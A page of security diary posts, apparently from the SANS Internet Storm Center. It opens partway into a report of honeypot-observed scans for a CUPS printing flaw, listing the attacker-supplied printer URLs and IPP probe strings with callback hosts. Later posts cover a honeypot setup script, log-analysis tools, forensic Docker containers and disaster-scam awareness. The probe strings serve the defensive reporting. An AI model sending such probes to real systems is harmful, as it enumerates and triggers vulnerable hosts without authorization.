We do see plenty of scanning to enumerate vulnerable systems, but at this point, no evidence of actual exploitations. But the honeypot is not responding to these requests, so we may be missing post-recon attempts to exploit the vulnerability
Top URLs
http://192.34.63.88:5674/printers/securitytest3/
The website is down now, but used to show a message that this is a scan to evaluate systems for research purposes. We do no t have a prior history from this IP address.
http://194.113.74.187:631/printers/amongus
Also no longer responding. The IP address is associated with security researcher Bill Demirkapi.
http://80.94.95.85:65000/printers/YmVuaWduYmUK "location_field" "info_field"
The string at the end of the URL decoded to "benignbe". The IP address was first seen last August scanning for various ports. The URL is no longer responding.
http://34.176.139.243/printers/YmVuaWducHJpbnRlcnMK "location_field" "info_field"
Note the similar base64 encoded string. This one decoded to "benignprinters".
http://t828r8qoegavzdeaqtn5jd9umlsdg34s.oastify.com/printers/research_cups_if_we_find_you_are_vulnerable_we_will_let_you_know_via_responsible_disclosure
The URL hopefully identifies the purpose of the scan correctly :) . Oastify.com is used by the Burp collaboration server.
http://172.214.128.90:65000/printers/YmVuaWduYmUK "location_field" "info_field"
Another "benignbe" URL. Interestingly a Microsoft/GitHub IP address.
http://87.236.176.146:631/classes/2ef46bd9-ae8f4743 (and similar URLs with varying random end)
This IP is associated with internet-measurement.com.
So far, I only saw two "ipp" URLs:
ipp://146.70.100.229:80/printers/ "XXlocation" "XXinfo" "XXmake-and-model"
and
ipp://199.247.0.94:631/printers/test
I will try to setup some automated responses soon to get a bit more detail.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
0 Comments
Kickstart Your DShield Honeypot [Guest Diary]
[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]
Introduction
Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.
What is DShieldKickStarter?
DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.
Key Features of DShieldKickStarter
• Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
• PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
• Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
• Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.
Step-by-Step Breakdown
The script automates several critical tasks:
1. Creating Directories and Setting Permissions
Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2. Installing Required Packages
Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3. Configuring Log Rotation and Backups
Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned to save space.
4. Automating PCAP Capture
Sets up tcpdump to capture network traffic, excluding predefined ports to ensure relevant data capture. The process is automated via cron jobs.
5. Optional Tool Integration
The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6. SCP Option for Off-Sensor Backup
If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.
Who Benefits from This?
• ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
• Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.
Tool Showcase
1. CowrieProcessor
Description
CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.
Usage and Benefits
The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.
Screenshot Explanation
In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.
CowrieProcessor output showing session details and malicious activities detected by the honeypot.
DShield SIEM (ELK)
Description
While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.
Usage and Benefits
Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.
ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.
Screenshot Explanation
The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.
KQL (Kibana Query Language)
One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"
This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"
With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.
[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
0 Comments
Security related Docker containers
Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided, I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting version of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:
The USAGE portion of each page should give enough info on how to run thems (and what directories to map into the container). Hopefully, some of the rest of you will find these useful.
---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu
0 Comments
Hurricane Helene Aftermath - Cyber Security Awareness Month
For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.
Fake Donation Sites
Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.
AI Social Media Posts
I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in some of the monetization schemes social media and video sites are participating. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will contribute to at least exaggeration of the impact of the event and reduce, in some cases, the credibility of legitimate recovery efforts
Malware
Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.
Fake Assistance Scams
In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. If it may take several months for the victim to become aware of this, they often face a request to repay the loan. Sadly, there is not much, if anything, to protect yourself from these scams. The intend of the assistance is to be quick and unburocratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.
"Grandparent Scam"
In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.
Final Word
Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":
- Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
- Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
- If you are lucky to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
- Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
- Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
1 Comments
0 Comments